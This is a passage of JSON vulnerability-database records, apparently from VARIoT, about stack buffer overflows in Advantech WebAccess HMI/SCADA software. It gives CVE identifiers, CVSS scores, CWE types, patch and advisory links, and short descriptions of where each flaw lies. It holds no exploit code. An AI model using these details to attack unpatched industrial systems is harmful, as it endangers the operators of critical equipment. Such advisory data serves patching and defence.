"4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "CNVD", "id": "CNVD-2019-08948" } ] }, "last_update_date": "2024-11-29T22:41:17.815000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 5.6, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-091-01" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess/SCADA Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/157945" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=91013" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-321" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-327" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "CNNVD", "id": "CNNVD-201904-089" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-121", "trust": 1.0 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-157985" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "NVD", "id": "CVE-2019-6550" } ] }, "references": { "_id": null, "data": [ { "trust": 8.9, "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-092-01" }, { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-091-01" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-585/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6550" }, { "trust": 1.3, "url": "http://www.securityfocus.com/bid/107675" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6550" }, { "trust": 0.6, "url": "https://support.advantech.com/support/downloadsrdetail_new.aspx?sr_id=1-ms9mjv\u0026doc_source=download" }, { "trust": 0.6, "url": "https://www.advantech.com/" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-19-330/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/78318" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "ZDI", "id": "ZDI-19-322" }, { "db": "ZDI", "id": "ZDI-19-311" }, { "db": "ZDI", "id": "ZDI-19-329" }, { "db": "ZDI", "id": "ZDI-19-325" }, { "db": "ZDI", "id": "ZDI-19-313" }, { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-318" }, { "db": "ZDI", "id": "ZDI-19-321" }, { "db": "ZDI", "id": "ZDI-19-330" }, { "db": "ZDI", "id": "ZDI-19-315" }, { "db": "ZDI", "id": "ZDI-19-323" }, { "db": "ZDI", "id": "ZDI-19-327" }, { "db": "CNVD", "id": "CNVD-2019-08948" }, { "db": "VULHUB", "id": "VHN-157985" }, { "db": "VULMON", "id": "CVE-2019-6550" }, { "db": "JVNDB", "id": "JVNDB-2019-003121" }, { "db": "CNNVD", "id": "CNNVD-201904-089" }, { "db": "NVD", "id": "CVE-2019-6550" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498", "ident": null }, { "db": "ZDI", "id": "ZDI-19-322", "ident": null }, { "db": "ZDI", "id": "ZDI-19-311", "ident": null }, { "db": "ZDI", "id": "ZDI-19-329", "ident": null }, { "db": "ZDI", "id": "ZDI-19-325", "ident": null }, { "db": "ZDI", "id": "ZDI-19-313", "ident": null }, { "db": "ZDI", "id": "ZDI-19-328", "ident": null }, { "db": "ZDI", "id": "ZDI-19-318", "ident": null }, { "db": "ZDI", "id": "ZDI-19-321", "ident": null }, { "db": "ZDI", "id": "ZDI-19-330", "ident": null }, { "db": "ZDI", "id": "ZDI-19-315", "ident": null }, { "db": "ZDI", "id": "ZDI-19-323", "ident": null }, { "db": "ZDI", "id": "ZDI-19-327", "ident": null }, { "db": "CNVD", "id": "CNVD-2019-08948", "ident": null }, { "db": "VULHUB", "id": "VHN-157985", "ident": null }, { "db": "VULMON", "id": "CVE-2019-6550", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2019-003121", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201904-089", "ident": null }, { "db": "NVD", "id": "CVE-2019-6550", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2019-04-03T00:00:00", "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-322", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-311", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-329", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-325", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-313", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-328", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-318", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-321", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-330", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-315", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-323", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-327", "ident": null }, { "date": "2019-04-03T00:00:00", "db": "CNVD", "id": "CNVD-2019-08948", "ident": null }, { "date": "2019-04-05T00:00:00", "db": "VULHUB", "id": "VHN-157985", "ident": null }, { "date": "2019-04-05T00:00:00", "db": "VULMON", "id": "CVE-2019-6550", "ident": null }, { "date": "2019-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003121", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-089", "ident": null }, { "date": "2019-04-05T19:29:00.310000", "db": "NVD", "id": "CVE-2019-6550", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-322", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-311", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-329", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-325", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-313", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-328", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-318", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-321", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-330", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-315", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-323", "ident": null }, { "date": "2019-04-02T00:00:00", "db": "ZDI", "id": "ZDI-19-327", "ident": null }, { "date": "2019-04-03T00:00:00", "db": "CNVD", "id": "CNVD-2019-08948", "ident": null }, { "date": "2020-10-06T00:00:00", "db": "VULHUB", "id": "VHN-157985", "ident": null }, { "date": "2020-10-06T00:00:00", "db": "VULMON", "id": "CVE-2019-6550", "ident": null }, { "date": "2019-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-003121", "ident": null }, { "date": "2020-10-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201904-089", "ident": null }, { "date": "2024-11-21T04:46:40.660000", "db": "NVD", "id": "CVE-2019-6550", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201904-089" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node bwthinfl Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-19-328" }, { "db": "ZDI", "id": "ZDI-19-321" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "4d85a7a9-a091-4c59-84e6-73c8b6639498" }, { "db": "CNNVD", "id": "CNNVD-201904-089" } ], "trust": 0.8 } }
var-202003-0167
Vulnerability from variot
In Advantech WebAccess, Versions 8.4.2 and prior. A stack-based buffer overflow vulnerability caused by a lack of proper validation of the length of user-supplied data may allow remote code execution. Advantech WebAccess Is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture of Chinese company Advantech (Advantech). The software supports dynamic graphic display and real-time data control, and provides functions for remote control and management of automated equipment.
There is a buffer overflow vulnerability in Advantech WebAccess 8.4.2 and previous versions. The vulnerability stems from the program's failure to correctly verify the length of data submitted by users. Attackers can use this vulnerability to execute code
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202003-0167", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "advantech", "version": "8.4.2" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "webaccess", "version": "*" }, { "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.4.2" } ], "sources": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "NVD", "id": "CVE-2020-10607" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-003531" } ] }, "cve": "CVE-2020-10607", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2020-10607", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 6.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-003531", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2020-19926", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "d5282d3d-a398-4571-b9bc-da30828c4d30", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-163102", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2020-10607", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-003531", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2020-10607", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-003531", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-19926", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202003-1645", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-163102", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "VULHUB", "id": "VHN-163102" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "CNNVD", "id": "CNNVD-202003-1645" }, { "db": "NVD", "id": "CVE-2020-10607" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In Advantech WebAccess, Versions 8.4.2 and prior. A stack-based buffer overflow vulnerability caused by a lack of proper validation of the length of user-supplied data may allow remote code execution. Advantech WebAccess Is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture of Chinese company Advantech (Advantech). The software supports dynamic graphic display and real-time data control, and provides functions for remote control and management of automated equipment. \n\r\n\r\nThere is a buffer overflow vulnerability in Advantech WebAccess 8.4.2 and previous versions. The vulnerability stems from the program\u0027s failure to correctly verify the length of data submitted by users. Attackers can use this vulnerability to execute code", "sources": [ { "db": "NVD", "id": "CVE-2020-10607" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "VULHUB", "id": "VHN-163102" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2020-10607", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-20-086-01", "trust": 3.1 }, { "db": "CNVD", "id": "CNVD-2020-19926", "trust": 1.3 }, { "db": "CNNVD", "id": "CNNVD-202003-1645", "trust": 1.3 }, { "db": "JVNDB", "id": "JVNDB-2020-003531", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2020.1084", "trust": 0.6 }, { "db": "IVD", "id": "D5282D3D-A398-4571-B9BC-DA30828C4D30", "trust": 0.2 }, { "db": "IVD", "id": "B9A6B9C9-B8DF-47A0-90C2-5D1880F27A53", "trust": 0.2 }, { "db": "IVD", "id": "FDD0B3F8-3949-42E4-A46F-0B16E2B5E110", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-163102", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "VULHUB", "id": "VHN-163102" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "CNNVD", "id": "CNNVD-202003-1645" }, { "db": "NVD", "id": "CVE-2020-10607" } ] }, "id": "VAR-202003-0167", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "VULHUB", "id": "VHN-163102" } ], "trust": 1.73470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNVD", "id": "CNVD-2020-19926" } ] }, "last_update_date": "2024-11-23T22:29:42.341000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess buffer overflow vulnerability (CNVD-2020-19926)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/211327" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113038" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "CNNVD", "id": "CNNVD-202003-1645" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.9 }, { "problemtype": "CWE-121", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-163102" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "NVD", "id": "CVE-2020-10607" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-086-01" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10607" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-10607" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1084/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "VULHUB", "id": "VHN-163102" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "CNNVD", "id": "CNNVD-202003-1645" }, { "db": "NVD", "id": "CVE-2020-10607" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNVD", "id": "CNVD-2020-19926" }, { "db": "VULHUB", "id": "VHN-163102" }, { "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "db": "CNNVD", "id": "CNNVD-202003-1645" }, { "db": "NVD", "id": "CVE-2020-10607" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-03-26T00:00:00", "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "date": "2020-03-26T00:00:00", "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "date": "2020-03-26T00:00:00", "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "date": "2020-03-28T00:00:00", "db": "CNVD", "id": "CNVD-2020-19926" }, { "date": "2020-03-27T00:00:00", "db": "VULHUB", "id": "VHN-163102" }, { "date": "2020-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "date": "2020-03-26T00:00:00", "db": "CNNVD", "id": "CNNVD-202003-1645" }, { "date": "2020-03-27T14:15:12.463000", "db": "NVD", "id": "CVE-2020-10607" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-03-29T00:00:00", "db": "CNVD", "id": "CNVD-2020-19926" }, { "date": "2020-04-01T00:00:00", "db": "VULHUB", "id": "VHN-163102" }, { "date": "2020-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-003531" }, { "date": "2020-04-03T00:00:00", "db": "CNNVD", "id": "CNNVD-202003-1645" }, { "date": "2024-11-21T04:55:41.350000", "db": "NVD", "id": "CVE-2020-10607" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202003-1645" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Out-of-bounds write vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-003531" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "d5282d3d-a398-4571-b9bc-da30828c4d30" }, { "db": "IVD", "id": "b9a6b9c9-b8df-47a0-90c2-5d1880f27a53" }, { "db": "IVD", "id": "fdd0b3f8-3949-42e4-a46f-0b16e2b5e110" }, { "db": "CNNVD", "id": "CNNVD-202003-1645" } ], "trust": 1.2 } }
var-201806-1814
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A stack buffer overflow vulnerability exists in Advantech WebAccess 'nvA1Media.ocx'. Failed exploit attempts will likely cause a denial-of-service condition
